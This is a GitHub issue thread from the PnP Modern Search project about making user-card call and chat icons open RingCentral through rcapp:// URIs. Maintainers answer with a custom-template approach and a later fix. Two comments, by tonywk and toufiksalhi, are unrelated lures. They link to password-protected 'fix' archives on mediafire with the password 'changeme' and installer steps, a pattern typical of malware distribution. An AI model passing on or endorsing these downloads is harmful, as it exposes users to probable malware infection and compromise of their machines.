### ISSUE TITLE
Replacing Teams with RingCentral

### ISSUE THREAD

**Issue by adumith** [microsoft-search/pnp-modern-search#3940]
Hello everyone,

I have successfully developed the page for my organization; it works just great.

The only issue we have is the following:
On the user card, I have three icons: one for making a call and another for starting a chat. When I click on the call icon, the RingCentral application generates an error because I am passing the email instead of the phone number. Here is the code:

![image](https://github.com/user-attachments/assets/4271fb13-df63-4977-a14c-b090e6274373)

For the chat, when clicking the icon, the system opens Teams instead of RingCentral. Here is the code:

![image](https://github.com/user-attachments/assets/733b4f68-d0c2-4082-bdd0-fa3514201880)

Consulting with the RingCentral development team, I was informed that `callto` is not a supported URI scheme for RC. To use RC for making calls, I need to use the following URI scheme:

**rcapp://r/call?number=<phone number>**

To open a chat window in RC, use the following scheme. Please replace `<chat id>` with the actual chat ID:

**rcapp://chat/r?groupid=<chat id>**

How can I modify the code to pass the phone number in the `<phone number>` field?

So, do you have any idea how can I approach this?

Thank you so much,

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mobun** [comment]
Hi,
I think the best option would be to create your own template to display the user card and to equip the button with the correct link for your case ( https://microsoft-search.github.io/pnp-modern-search/extensibility/templating/).
Maybe someone else has another idea, but that would be my approach.

**Comment by kasperbolarsen** [comment]
I agree with @mobun , a custom template is the way forward. We have a repository containing various layouts submitted by the community , you might find some inspiration there, https://github.com/microsoft-search/pnp-modern-search-layouts/tree/main/Results/Handlebars

**Comment by wobba** [comment]
Added `rcapp`in #3972. So in the dev branch and next release.
